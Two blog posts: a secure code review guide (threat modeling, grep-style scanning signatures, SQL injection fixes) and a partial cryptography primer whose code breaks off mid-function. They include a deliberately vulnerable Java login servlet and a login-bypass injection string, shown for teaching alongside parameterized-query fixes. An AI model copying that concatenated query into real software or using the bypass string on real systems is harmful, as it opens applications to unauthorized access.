<b>What is the most important thing in a code review</b><br />
<br />
The most important thing is applying proper threat modeling. <u>Threat modeling is an approach for analyzing the security of an application</u>. It is a structured approach that enables you to identify, quantify, and address the security risks associated with an application. Threat modeling is not an approach to reviewing code, but it does complement the security code review process. The inclusion of threat modeling in the SDLC can help to ensure that applications are being developed with security built in from the very beginning. This, combined with the documentation produced as part of the threat modeling process, can give the reviewer a greater understanding of the system. This allows the reviewer to see where the entry points to the application are and the threats associated with each entry point. The concept of threat modeling is not new, but there has been a clear mindset change in recent years.<br />
<br />
Modern threat modeling looks at a system from a potential attacker's perspective, as opposed to a defender's view point. Microsoft have been strong advocates of the process over the past number of years. They have made threat modeling a core component of their SDLC which they claim to be one of the reasons for the increased security of their products in recent years.<br />
<br />
There are at least three general approaches to threat modeling:<br />
<br />
<b>Attacker-centric</b><br />
<br />
Attacker-centric threat modeling starts with an attacker, and evaluates their goals, and how they might achieve them. Attacker's motivations are often considered, for example, "The NSA wants to read this email," or "Jon wants to copy this DVD and share it with his friends." This approach usually starts from either entry points or assets.<br />
<br />
<b>Software-centric</b><br />
<br />
Software-centric threat modeling (also called 'system-centric,' 'design-centric,' or 'architecture-centric') starts from the design of the system, and attempts to step through a model of the system, looking for types of attacks against each element of the model. This approach is used in threat modeling in Microsoft's Security Development Lifecycle.<br />
<br />
<b>Asset-centric</b><br />
<br />
Asset-centric threat modeling involves starting from assets entrusted to a system, such as a collection of sensitive personal information.<br />
<br />
<b>The threat modeling</b><br />
<br />
<div>
The threat modeling process can be decomposed into 3 high level steps:</div>
<div>
<br />
<b>Step 1: </b>Decompose the Application:<br />
<ul>
<li>Create use-cases to understand how the application is used.</li>
<li>Identify entry points.</li>
<li>Identify assets.</li>
<li>Identify trust levels to external entities.</li>
</ul>
</div>
<div>
<b>Note:</b> This stage has to do with understanding the context of the Web Application and its surrounding entities.</div>
<div>
<br /></div>
<div>
The following images show the Business Architecture (Business Owner's Perspective) and Business Architecture Behavior of a Web Application:</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEtTUTuCe1nrKpW_Rq_tf8I5WojUFaYc2Z723VL7E6kV974GKnZ9a9lrS22AXh8C31KcWfWA_Nf4ZP3DkWq9RM0Q8WFVMgbhZLm_QsWL1XU1-_hcboz05JZ-C2QPHBJZ6OdvN-pwpw-q8/s1600/Business_structure_model.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEtTUTuCe1nrKpW_Rq_tf8I5WojUFaYc2Z723VL7E6kV974GKnZ9a9lrS22AXh8C31KcWfWA_Nf4ZP3DkWq9RM0Q8WFVMgbhZLm_QsWL1XU1-_hcboz05JZ-C2QPHBJZ6OdvN-pwpw-q8/s1600/Business_structure_model.gif" /></a></div>
<div>
<br />
<div>
<b>Note:</b> Lists the entities important to the business. Business entities can be a person, a thing or a concept that is part of or interacts with the business process (Proforma 2003). In the example of "XYZ-Match", the business entities include the following: Investors, Entrepreneurs, "XYZ-Match" web system.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNo8QHek88F5yKFjbknj06ZcGyytbuT6bVLMF35SoiLTRn8wrAN70exf6bi8vJFiKWYlMUB9z9pn3a6X_SbZlDvURiiL9a3SPEyfO0RbTAXJlXIM4jSCCaaPkb7wBEA3WS-L2GC0QnTlU/s1600/Business_process_model1.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNo8QHek88F5yKFjbknj06ZcGyytbuT6bVLMF35SoiLTRn8wrAN70exf6bi8vJFiKWYlMUB9z9pn3a6X_SbZlDvURiiL9a3SPEyfO0RbTAXJlXIM4jSCCaaPkb7wBEA3WS-L2GC0QnTlU/s1600/Business_process_model1.gif" /></a></div>
<div>
<br /></div>
<b>Note:</b> Lists the processes in which the business operates. In the example of "XYZ-Match", "Investor listing information to Venture Capital Directory" is one of such business processes. </div>
<div>
<br />
<b>Step 2:</b> Determine and rank threats (the threat categorization methodology):<br />
<ul>
<li>Auditing &amp; Logging</li>
<li>Authentication</li>
<li>Authorization</li>
<li>Configuration Management</li>
<li>Data Protection in Storage and Transit</li>
</ul>
</div>
<b>Note</b>: This stage has to do with mapping the vulnerabilities to a category. <br />
<br />
Threat listing is an important part of Web Application code auditing. Threat lists based, for example, on the STRIDE model are useful in the identification of threats with regard to the attacker's goals. For example, if the threat scenario is attacking the login, would the attacker brute force the password to break the authentication? If the threat scenario is to try to elevate privileges to gain another user's privileges, would the attacker try to perform forceful browsing? Categorizing and grouping the Web Application threats helps to see which Web Application security controls have the majority of the problems; it is like a blinking LED that says "Hey, I have multiple problems, save me please, I am a poor cod dying out, save me".<br />
<b><br /></b>
<br />
<div>
<b>Step 3:</b> Determine countermeasures and mitigation.<br />
<br />
<b>Note:</b> Such countermeasures can be identified using threat-countermeasure mapping lists. The risk mitigation strategy might involve evaluating these threats from the business impact that they pose and reducing the risk.<br />
<br />
The objective of risk management should be to reduce the impact that the exploitation of a threat can have to the application (not to necessarily mitigate the risk!). This can be done by responding to a theat with a risk mitigation strategy. In general there are five options to mitigate threats <br />
<ol>
<li>Do nothing: for example, hoping for the best. </li>
<li>Informing about the risk: for example, warning user population about the risk. </li>
<li>Mitigate the risk: for example, by putting countermeasures in place. </li>
<li>Accept the risk: for example, after evaluating the impact of the exploitation (business impact). </li>
<li>Transfer the risk: for example, through contractual agreements and insurance. </li>
</ol>
</div>
<div>
The decision of which strategy is most appropriate depends on the impact an exploitation of a threat can have, the likelihood of its occurrence, and the costs of transferring it (e.g. insurance costs) or avoiding it (e.g. costs or losses due to redesign). Putting the steps together:<br />
<ul>
<li>Define the application requirements:
<ol>
<li>Identify business objectives</li>
<li>Identify user roles that will interact with the application</li>
<li>Identify the data the application will manipulate</li>
<li>Identify the use cases for operating on that data that the application will facilitate</li>
</ol>
</li>
<li>Model the application architecture:
<ul>
<li>Model the components of the application</li>
<li>Model the service roles that the components will act under</li>
<li>Model any external dependencies</li>
<li>Model the calls from roles, to components and eventually to the data store for each use case identified above</li>
</ul>
</li>
<li>Identify any threats to the confidentiality, availability and integrity of the data and the application, based on the data access control matrix that your application should be enforcing</li>
<li>Assign risk values and determine the risk responses</li>
<li>Determine the countermeasures to implement based on your chosen risk responses</li>
<li>Continually update the threat model based on the emerging security landscape.</li>
</ul>
</div>
<div>
<b>Simple tools to use for code auditing </b><br />
<br />
Graudit is a simple script with signature sets that lets you find potential security flaws in source code using the GNU utility grep. It is comparable to other static analysis tools such as RATS, SWAAT and Flawfinder, while keeping the technical requirements to a minimum and being very flexible. Graudit supports scanning code written in several languages: asp, jsp, perl, php and python.<br />
<br />
Graudit usage: <i><span style="color: blue;">graudit /path/to/scan</span></i></div>
<div>
<br /></div>
<div>
Graudit prerequisites: bash, grep, sed </div>
<div>
<br />
The following picture shows a screenshot of the tool:</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0QL4yeCLesret4c-iJk99MlLlq4hOVuxIXgQiamOHYv19Z4w6Cs9bQVrHqowT_SDDz-AzzoiY5XEPaZfFDNaLDC0kP3Ggt4_WmB6LewFj-kvOTZkkmysKtGDwFSQ8DkkNjrPH_MvytWY/s1600/graudit.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0QL4yeCLesret4c-iJk99MlLlq4hOVuxIXgQiamOHYv19Z4w6Cs9bQVrHqowT_SDDz-AzzoiY5XEPaZfFDNaLDC0kP3Ggt4_WmB6LewFj-kvOTZkkmysKtGDwFSQ8DkkNjrPH_MvytWY/s1600/graudit.jpeg" /></a></div>
<div>
<b><br /></b></div>
<div>
<b>Note:</b> You can download Graudit from this <a href="http://www.justanotherhacker.com/projects/graudit.html">link</a>. The basic concept behind the tool is that you provide it with a set of signatures (patterns of code lines) and it searches the source for them. As an alternative to Graudit you can use common Windows command-line tools such as findstr and find.</div>
<div>
<br /></div>
<div>
The findstr Windows command-line tool searches for text (as specified by pattern) in the file file-name. If file-name contains wildcards (* or ?), it searches all files that match. The /S option searches the current directory as well as its subdirectories. If pattern contains spaces, it must be specified as /C:"some text to be searched". To treat pattern as a regular expression, the /R option must be used. The /I option makes the search case-insensitive. It is also possible to pipe the output of another command through findstr. </div>
<div>
<br /></div>
<div>
For example, the following command finds all files whose name contains either an m or a p: </div>
<div>
<i><span style="color: blue;"><br /></span></i></div>
<div>
<i><span style="color: blue;">C:\> dir /B | findstr /R /C:"[mp]"</span></i></div>
<div>
<div>
<br />
<b>Note: </b>You can find more examples for findstr in the Microsoft command line page.<br />
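<br />
<div style="text-align: justify;">
To make the grep-signature idea concrete, here is an added example (it is not part of the original post and not Graudit's own code) of a minimal signature scanner written in Python. The "category regex" line layout, the category tags and the patterns are our own constructed choices, modelled on how Graudit keeps one regular expression per line; the sample Java source is a constructed, condensed copy of the login code reviewed further down. Findings are also counted per category, which gives the "which control has the most problems" view from Step 2.</div>

```python
import re
from collections import Counter
from typing import List, NamedTuple


class Signature(NamedTuple):
    category: str
    regex: "re.Pattern"


class Finding(NamedTuple):
    lineno: int
    category: str
    pattern: str
    text: str


# Constructed signature set in the spirit of Graudit's per-language signature
# files (one regular expression per line, "#" starts a comment). The
# "category regex" layout and the patterns are ours, not Graudit's shipped set.
JAVA_SIGNATURES = r"""
# SQL built with string concatenation and run through a plain Statement
sqli   "\s*\+\s*[A-Za-z_]\w*\s*\+\s*"
sqli   \.createStatement\s*\(
sqli   \.(executeQuery|executeUpdate|execute)\s*\(\s*[A-Za-z_]\w*\s*\)
# Raw HTTP input entering the code
input  request\.getParameter\s*\(
# Credentials kept in source
creds  (PASSWORD|passwd|pwd)\s*=\s*"[^"]+"
"""

# Constructed sample input: a condensed copy of the vulnerable login servlet.
SAMPLE_JAVA = """String PASSWORD = "admin123";
Connection connection = DriverManager.getConnection(DataURL, LOGIN, PASSWORD);
String Username = request.getParameter("USER");
String Password = request.getParameter("PASSWORD");
String sel = "SELECT User_id, Username FROM USERS WHERE Username = '" + Username + "' AND Password = '" + Password + "'";
Statement selectStatement = connection.createStatement();
ResultSet resultSet = selectStatement.executeQuery(sel);
"""


def load_signatures(text: str) -> List[Signature]:
    """Parse 'category regex' lines; blank lines and '#' comments are skipped."""
    signatures = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        category, _, pattern = line.partition(" ")
        signatures.append(Signature(category, re.compile(pattern.strip())))
    return signatures


def scan(source: str, signatures: List[Signature]) -> List[Finding]:
    """grep-style pass: every (line, signature) hit becomes one Finding."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for sig in signatures:
            if sig.regex.search(line):
                findings.append(Finding(lineno, sig.category, sig.regex.pattern, line.strip()))
    return findings


def summarize(findings: List[Finding]) -> Counter:
    """Hits per category: the 'which control has the most problems' view."""
    return Counter(f.category for f in findings)


if __name__ == "__main__":
    hits = scan(SAMPLE_JAVA, load_signatures(JAVA_SIGNATURES))
    for h in hits:
        print(f"{h.lineno}:{h.category}: {h.text}")
    print(dict(summarize(hits)))
```

<div style="text-align: justify;">
Like grep, this only matches text: a hit on <i>createStatement</i> or on string concatenation inside a query is a place to look, not a confirmed vulnerability, and a parameterized query that happens to build its text from constants will also be flagged. That is the trade-off the text describes for Graudit and findstr: minimal requirements and full flexibility, at the cost of manual triage of each hit.</div>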
<br />
<b>Cod(e) reviewing for SQL Injection</b><br />
<br />
Use database stored procedures, but remember that even stored procedures can be vulnerable. Use parameterized queries instead of dynamic SQL statements. Validate all external input: ensure that all SQL statements treat user inputs as variables, and that statements are precompiled before the actual inputs are substituted for the variables (as Java's precompiled statements do). A simplified way of thinking about SQL injection during a security code review is to look for type-casting checks at multiple layers throughout the whole Web Application system. For example, type casting should occur in at least two different places: the Web Application's input validation filter and the database the Web Application connects to. Additional layers of defense can be added through a Web Application Firewall (WAF) and a Database Application Firewall. <br />
<br />
The following picture shows a yes/no flow chart explaining the SQL injection decision flow:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOHSAh3lCDw0NMmD-BGQfSZJcdMlkvsnhvBDc4Y6maKXoX_wNrhqPQJZJFTzdQ7JyHe-cJ-w30IN6-OGbnPOYj_qZdADgHbAFzJA4_8EYbYZ3nlR20um5JXNiBrlHVSu1djFGxxEv-PBU/s1600/phpAt2vLYPM.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOHSAh3lCDw0NMmD-BGQfSZJcdMlkvsnhvBDc4Y6maKXoX_wNrhqPQJZJFTzdQ7JyHe-cJ-w30IN6-OGbnPOYj_qZdADgHbAFzJA4_8EYbYZ3nlR20um5JXNiBrlHVSu1djFGxxEv-PBU/s1600/phpAt2vLYPM.jpg" /></a></div>
<br />
<br />
<b>Note: </b>This is a very simplified SQL Injection threat model.<br />
<br />
The Java code that originally introduces the SQL injection vulnerability (imports and a servlet wrapper are added here so the fragment compiles, and a missing semicolon is fixed; the vulnerable query construction is unchanged):<br />
<br /></div>
<div>
<i><span style="color: lime;">// Imports and servlet wrapper added so the fragment compiles</span><br />
import java.io.IOException;<br />
import java.io.PrintWriter;<br />
import java.sql.*;<br />
import javax.servlet.http.*;<br />
<br />
public class LoginServlet extends HttpServlet {<br />
<br />
  protected void doPost(HttpServletRequest request, HttpServletResponse response) throws IOException {<br />
    try {<br />
      <span style="color: lime;">// Define variables to use</span><br />
      String DRIVER = "com.ora.jdbc.Driver";<br />
      String DataURL = "jdbc:db://localhost:5112/users";<br />
      String LOGIN = "admin";<br />
      String PASSWORD = "admin123";<br />
<br />
      Class.forName(DRIVER);<br />
<br />
      <span style="color: lime;">// Make connection to DB</span><br />
      Connection connection = DriverManager.getConnection(DataURL, LOGIN, PASSWORD);<br />
<br />
      String Username = request.getParameter("USER"); <span style="color: lime;">// From HTTP request, no validation</span><br />
      String Password = request.getParameter("PASSWORD"); <span style="color: lime;">// From HTTP request, no validation</span><br />
      int iUserID = -1;<br />
      String sLoggedUser = "";<br />
<br />
      <span style="color: lime;">// VULNERABLE: user input is concatenated straight into the SQL text</span><br />
      String sel = "SELECT User_id, Username FROM USERS WHERE Username = '" + Username + "' AND Password = '" + Password + "'";<br />
<br />
      Statement selectStatement = connection.createStatement();<br />
      ResultSet resultSet = selectStatement.executeQuery(sel);<br />
<br />
      if (resultSet.next()) {<br />
        iUserID = resultSet.getInt(1);<br />
        sLoggedUser = resultSet.getString(2);<br />
      }<br />
<br />
      PrintWriter writer = response.getWriter();<br />
<br />
      if (iUserID >= 0) {<br />
        writer.println("User logged in: " + sLoggedUser);<br />
      } else {<br />
        writer.println("Access Denied!"); <span style="color: lime;">// semicolon was missing in the original</span><br />
      }<br />
    } catch (ClassNotFoundException | SQLException e) {<br />
      throw new IOException(e);<br />
    }<br />
  }<br />
}</i><br />
<br />
When SQL statements are dynamically created as software executes, there is an opportunity for a security breach, since the input data can truncate, malform or even expand the original SQL query. Firstly, request.getParameter retrieves the data for the SQL query directly from the HTTP request without any data validation (min/max length, permitted characters, malicious characters). This error makes it possible to supply SQL as the payload and alter the functionality of the statement.<br />
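<br />
<div style="text-align: justify;">
The following is an added example (not from the original post) that reproduces the reviewed login query in Python on an in-memory SQLite table and puts the two review recommendations beside it: a parameterized query, and an input-validation layer with a length limit and a permitted-character list. The USERS rows, the validation policy and the malformed test input are constructed for the example; the column names follow the servlet above.</div>

```python
import re
import sqlite3
from typing import Optional, Tuple

# Constructed stand-in for the servlet's USERS table. Plaintext passwords are
# kept only because that is what the reviewed query compares against.
USERS = [(1, "admin", "admin123"), (2, "alice", "s3cret")]

Row = Optional[Tuple[int, str]]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE USERS (User_id INTEGER, Username TEXT, Password TEXT)")
    conn.executemany("INSERT INTO USERS VALUES (?, ?, ?)", USERS)
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> Row:
    """Same construction as the servlet's `sel`: input concatenated into the SQL text."""
    sel = ("SELECT User_id, Username FROM USERS WHERE Username = '" + username
           + "' AND Password = '" + password + "'")
    return conn.execute(sel).fetchone()


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> Row:
    """Parameterized query: the statement is compiled first and the values are
    bound afterwards, so input is always data and never part of the SQL grammar."""
    sel = "SELECT User_id, Username FROM USERS WHERE Username = ? AND Password = ?"
    return conn.execute(sel, (username, password)).fetchone()


# Input-validation layer of the kind the text asks for: min/max length plus a
# permitted-character allow-list. Constructed policy; adjust to the application.
CREDENTIAL_RE = re.compile(r"[A-Za-z0-9_.@-]{1,64}")


def validate_credential(value: str) -> bool:
    return CREDENTIAL_RE.fullmatch(value) is not None


def login_defended(conn: sqlite3.Connection, username: str, password: str) -> Row:
    """Both layers together: reject malformed input early, then bind parameters."""
    if not (validate_credential(username) and validate_credential(password)):
        return None
    return login_safe(conn, username, password)


if __name__ == "__main__":
    conn = make_db()
    # Constructed malformed input: a quote that closes the literal followed by an
    # always-true condition, the kind of "expanding" input the text describes.
    malformed = "' OR '1'='1"
    print("vulnerable:", login_vulnerable(conn, "nobody", malformed))
    print("parameterized:", login_safe(conn, "nobody", malformed))
    print("validated + parameterized:", login_defended(conn, "nobody", malformed))
    print("legitimate:", login_defended(conn, "alice", "s3cret"))
```

<div style="text-align: justify;">
With the concatenated query the malformed password logs in as the first row of the table; with the parameterized query the same string is simply a password that matches no row, and the validation layer rejects it before any query runs. The two layers are the "type casting in at least two different places" from the review advice: the filter enforces the shape of the input, the database driver enforces that it stays data. A real system would also store password hashes rather than compare plaintext, which the reviewed schema does not do.</div>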
<br />
<b>Epilogue</b><br />
<div>
<br /></div>
Educating developers to write secure code is the paramount goal of a secure code review. Taking code review from this standpoint is the only way to promote and improve code quality. Part of the education process is to empower developers with the knowledge to write better code. This can be done by providing developers with a controlled set of rules against which they can compare their code. Automated tools provide this functionality and also help reduce the time overhead. A developer can check his/her code using a tool without much initial knowledge of the security concerns pertaining to the task at hand. Also, running a tool to assess the code is a fairly painless task once the developer becomes familiar with the tool(s).<br />
<br />
<b>References:</b><br />
<div style="background-color: white;">
<ul>
<li><a href="https://www.owasp.org/index.php/Crawling_Code" target="_blank">https://www.owasp.org/index.php/Crawling_Code</a></li>
<li><a href="https://www.owasp.org/index.php/Searching_for_Code_in_J2EE/Java" target="_blank">https://www.owasp.org/index.php/Searching_for_Code_in_J2EE/Java</a></li>
<li><a href="https://www.owasp.org/index.php/Searching_for_Code_in_Classic_ASP" target="_blank">https://www.owasp.org/index.php/Searching_for_Code_in_Classic_ASP</a></li>
<li><a href="https://www.owasp.org/index.php/JavaScript/Web_2.0_Keywords_and_Pointers" target="_blank">https://www.owasp.org/index.php/JavaScript/Web_2.0_Keywords_and_Pointers</a></li>
<li><a href="http://en.wikipedia.org/wiki/Code_review">http://en.wikipedia.org/wiki/Code_review</a></li>
<li><a href="https://www.owasp.org/images/2/2e/OWASP_Code_Review_Guide-V1_1.pdf">https://www.owasp.org/images/2/2e/OWASP_Code_Review_Guide-V1_1.pdf</a></li>
<li><a href="http://ausweb.scu.edu.au/aw04/papers/refereed/kong/paper.html" target="_blank">http://ausweb.scu.edu.au/aw04/papers/refereed/kong/paper.html</a></li>
<li><a href="http://msdn.microsoft.com/en-us/library/ee823878(v=cs.20).aspx">http://msdn.microsoft.com/en-us/library/ee823878(v=cs.20).aspx</a></li>
<li><a href="http://www.justanotherhacker.com/projects/graudit.html">http://www.justanotherhacker.com/projects/graudit.html</a></li>
<li><a href="http://www.adp-gmbh.ch/win/cmd/findstr.html">http://www.adp-gmbh.ch/win/cmd/findstr.html</a></li>
<li><a href="http://www.microsoft.com/resources/documentation/windows/xp/all/proddocs/en-us/findstr.mspx?mfr=true">http://www.microsoft.com/resources/documentation/windows/xp/all/proddocs/en-us/findstr.mspx?mfr=true</a></li>
<li><a href="http://en.wikipedia.org/wiki/Threat_model">http://en.wikipedia.org/wiki/Threat_model</a></li>
</ul>
</div>
<br />
<br />
<br /></div>
</div>
<div class="blogger-post-footer">Penetest Horror Blog</div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-7947080244954191821.post-1946391758616839752012-11-03T13:04:00.004-07:002012-11-06T02:11:24.098-08:00Crypto for pentesters
<br />
<h1>
<span style="font-family: Times, Times New Roman, serif; font-size: large;"><a name="_Toc255256447"></a>Introduction</span></h1>
<div class="MsoNormal">
<span style="font-family: Times, Times New Roman, serif;">
The purpose of this paper is to emphasize the importance of cryptography, focus on the RSA asymmetric cryptographic algorithm, and explain:</span></div>
<div class="MsoNormal">
<span style="font-family: Times, Times New Roman, serif;"><br /></span></div>
<ul style="margin-top: 0cm;" type="disc">
<li class="MsoNormal"><span style="font-family: Times, Times New Roman, serif;">What cryptography is</span></li>
<li class="MsoNormal"><span style="font-family: Times, Times New Roman, serif;">Why cryptography is important</span></li>
<li class="MsoNormal"><span style="font-family: Times, Times New Roman, serif;">History of cryptography</span></li>
<li class="MsoNormal"><span style="font-family: Times, Times New Roman, serif;">Mathematical RSA operations</span></li>
<li class="MsoNormal"><span style="font-family: Times, Times New Roman, serif;">How to perform an RSA brute-force</span></li>
</ul>
<div>
<br />
<b><span style="font-size: large;">What is Cryptography</span></b><br />
<br />
<span style="font-family: Times, 'Times New Roman', serif;">Cryptography
(or cryptology; from Greek κρυπτός, kryptos, "hidden, secret"; and
γράφω, gráphō, "I write", or -λογία, -logia, respectively) is the
practice and study of hiding information. Modern cryptography intersects the
disciplines of mathematics, computer science, and engineering. Applications of
cryptography include ATM cards, computer passwords, and electronic commerce. [2]</span><br />
<div class="MsoNormal">
<span style="font-family: Times, Times New Roman, serif;"><br /></span></div>
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">Until recently
cryptography referred mostly to encryption, which is the process of converting
ordinary information (plaintext) into unintelligible gibberish (i.e. cipher-text).
[4] </span><span style="font-family: Times, 'Times New Roman', serif;">Decryption
is the reverse: moving from unreadable cipher-text back to plaintext. A cipher is
a pair of algorithms that perform the encryption and its reverse, the decryption. [4] </span><span style="font-family: Times, 'Times New Roman', serif;">The
operation of an algorithmic cipher is controlled both by the algorithm and, in
each instance, by a key. The key is a secret parameter (ideally known only to
the communicants) for a specific message exchange context. [4]</span></div>
<div class="MsoNormal">
<span style="font-family: Times, Times New Roman, serif;"><br /></span></div>
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">In order
for two parties to exchange an encrypted message, both must have one or two
secret keys (depending on whether the parties use an asymmetric or a symmetric
algorithm) and a known mathematical cryptographic algorithm (both parties must
know the details of the algorithm). The following diagram shows
the process. </span></div>
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><br /></span></div>
<div class="MsoNormal">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDyaxY6md7D5mOLGaA6Q-26IfAUWFnqdvupGl3S5tMfC8tt8eqwJNx8tJrMcROQrnp2hyphenhyphen67HduNnTVQ7cdxQaUYcstGxsoY-Q_syaKNEOftOllIwEyeg-GxRgHtF-6qULqyup0AUr4hwk/s1600/c1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Times, Times New Roman, serif;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDyaxY6md7D5mOLGaA6Q-26IfAUWFnqdvupGl3S5tMfC8tt8eqwJNx8tJrMcROQrnp2hyphenhyphen67HduNnTVQ7cdxQaUYcstGxsoY-Q_syaKNEOftOllIwEyeg-GxRgHtF-6qULqyup0AUr4hwk/s1600/c1.png" /></span></a></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><br /></span></div>
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Times, Times New Roman, serif;"><b>Picture 2</b>: Simple
encryption/decryption operation (if the cryptography used is symmetric then
key1 = key2) [3]</span></div>
<div class="MsoNormal">
<span style="font-family: Times, Times New Roman, serif;"><br /></span></div>
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><b>Note</b>: Secret keys
are very important: a cipher without a variable key (one whose only secret is the
algorithm itself) can be trivially broken with nothing more than knowledge of the
cipher used, and is therefore not useful at all in most cases.</span></div>
<br />
<span style="font-family: Times, Times New Roman, serif; font-size: large;"><b>History of Cryptography</b></span><br />
<span style="font-family: Times, 'Times New Roman', serif;"><br /></span></div>
<div>
<span class="Apple-style-span" style="font-family: Times, 'Times New Roman', serif;">Before the modern era, cryptography was concerned solely with message confidentiality (i.e., encryption) — conversion of messages from a comprehensible form into an incomprehensible one and back again at the other end, rendering it unreadable by interceptors or eavesdroppers without secret knowledge (namely the key needed for decryption of that message). Encryption was used to (attempt to) ensure secrecy in communications, such as those of spies, military leaders, and diplomats. [6]</span><br />
<span style="font-family: Times, Times New Roman, serif;"><br /></span><span style="font-family: Times, 'Times New Roman', serif;">The earliest forms of secret writing required little more than local pen and paper analogs, as most people could not read. More literacy, or literate opponents, required actual cryptography. The main classical cipher types are transposition ciphers, which rearrange the order of letters in a message (e.g., 'hello world' becomes 'ehlol owrdl' in a trivially simple rearrangement scheme), and substitution ciphers, which systematically replace letters or groups of letters with other letters or groups of letters (e.g., 'fly at once' becomes 'gmz bu podf' by replacing each letter with the one following it in the Latin alphabet). [6]</span><br />
<br />
<span style="font-size: large;"><b>Asymmetric and Symmetric Cryptography </b></span><br />
<br />
<span style="font-family: Times, 'Times New Roman', serif;">Cryptography consists of two main categories (some people might claim more categories, but for the purposes of this paper two categories cover its needs). The first category is symmetric cryptography and the second category is asymmetric cryptography.</span><br />
<div class="New">
<br />
<span style="font-family: Times, Times New Roman, serif; font-size: large;"><b> Symmetric Cryptography</b></span></div>
<div class="New">
<span style="font-family: Times, Times New Roman, serif;"><br /></span></div>
<div class="New">
<span style="font-family: Times, Times New Roman, serif;">Symmetric cryptography uses algorithms that use identical cryptographic keys for both encryption and decryption (this is not entirely true, but again for the purposes of this paper we accept it as a fact). The symmetric keys, in practice, represent a shared secret between two or more parties that can be used to maintain a private information link. [5] The following simple mathematical relationships describe the relation between encryption and decryption in symmetric cryptography.</span><br />
<br />
<span style="color: red;">Encryption ( k , Plaintext ) = Cipher (1) </span><br />
<br />
<span style="color: red;">Decryption ( k , Cipher ) = Plaintext (2) </span></div>
<div class="New">
<br /></div>
<div class="New">
Where k is a shared secret value and Plaintext is the data input we want to convert into a cipher. From relationships (1) and (2) we can conclude that: </div>
<div class="New">
<br />
<span style="color: red;">Plaintext = Decryption ( k , Cipher ) = Decryption ( k , Encryption ( k , Plaintext )) (3) </span><br />
<span style="color: red;"><br /></span></div>
<div class="New">
<b>Note</b>: Among the most popular and well-respected symmetric algorithms are Twofish, Serpent, AES (Rijndael), Blowfish, CAST5, RC4, TDES, and IDEA.</div>
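<div class="New">The two classical cipher types from the History section and relation (3) from the Symmetric Cryptography section, worked through in Python as an added example (this is not code from the original paper). The shift key k = 1 and the word permutation key (1, 0, 2, 4, 3) are my choices that reproduce the page's own 'gmz bu podf' and 'ehlol owrdl' examples, and the brute-force helper illustrates the earlier Note: a cipher whose key space is tiny (or absent) is broken by knowing the algorithm alone.</div>

```python
# Added example, not part of the original paper: classical substitution and
# transposition ciphers as keyed Encryption(k, Plaintext) / Decryption(k, Cipher)
# pairs, checked against relation (3): Plaintext = Decryption(k, Encryption(k, Plaintext)).
# Assumes lowercase Latin letters; other characters pass through unchanged.
import string

ALPHABET = string.ascii_lowercase


def shift_encrypt(k: int, plaintext: str) -> str:
    """Substitution cipher: replace each letter with the one k places later
    in the Latin alphabet (k = 1 turns 'fly at once' into 'gmz bu podf')."""
    out = []
    for ch in plaintext:
        if ch in ALPHABET:
            out.append(ALPHABET[(ALPHABET.index(ch) + k) % 26])
        else:
            out.append(ch)  # spaces and punctuation are left as they are
    return "".join(out)


def shift_decrypt(k: int, cipher: str) -> str:
    """Decryption(k, Cipher): shifting back by k undoes shift_encrypt."""
    return shift_encrypt(-k, cipher)


def transpose_encrypt(perm: tuple, plaintext: str) -> str:
    """Transposition cipher: reorder the letters of each word with the
    permutation key `perm`, where perm[i] is the index of the source letter
    that lands in position i. Words whose length differs from len(perm)
    are left untouched (a simplification chosen for this example)."""
    words = []
    for word in plaintext.split(" "):
        if len(word) == len(perm):
            words.append("".join(word[i] for i in perm))
        else:
            words.append(word)
    return " ".join(words)


def transpose_decrypt(perm: tuple, cipher: str) -> str:
    """Decrypt by applying the inverse permutation (inverse[perm[i]] = i)."""
    inverse = [0] * len(perm)
    for pos, src in enumerate(perm):
        inverse[src] = pos
    return transpose_encrypt(tuple(inverse), cipher)


def round_trips(k: int, plaintext: str) -> bool:
    """Relation (3) for the shift cipher: decrypting the encryption with the
    same key k must give back the original plaintext."""
    return shift_decrypt(k, shift_encrypt(k, plaintext)) == plaintext


def brute_force_shift(cipher: str, known_word: str):
    """The Note's point in practice: the shift cipher has only 25 usable keys,
    so knowing the algorithm is enough to try them all. Returns the first key
    whose decryption contains `known_word` (a crib), or None."""
    for k in range(1, 26):
        if known_word in shift_decrypt(k, cipher):
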